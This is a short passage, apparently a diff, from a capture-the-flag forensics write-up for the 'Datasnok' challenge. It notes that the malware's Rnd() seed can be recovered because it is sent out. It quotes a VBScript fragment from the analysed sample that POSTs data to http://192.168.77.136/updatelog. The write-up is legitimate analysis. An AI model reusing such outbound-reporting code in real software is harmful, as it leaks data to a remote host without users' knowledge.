spydx/equinor-ctf-2024/writeups/forensics/Honey, I shrunk the skids/Datasnok/writeup.md

 Since Rnd() is deterministic we could recover strRandom if we had the seed.

+As we can see in this snippet the seed is actually sent to http://192.168.77.136/updatelog

 ```vbscript
 Set httpRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
 httpRequest.Open "POST", "http://192.168.77.136/updatelog", False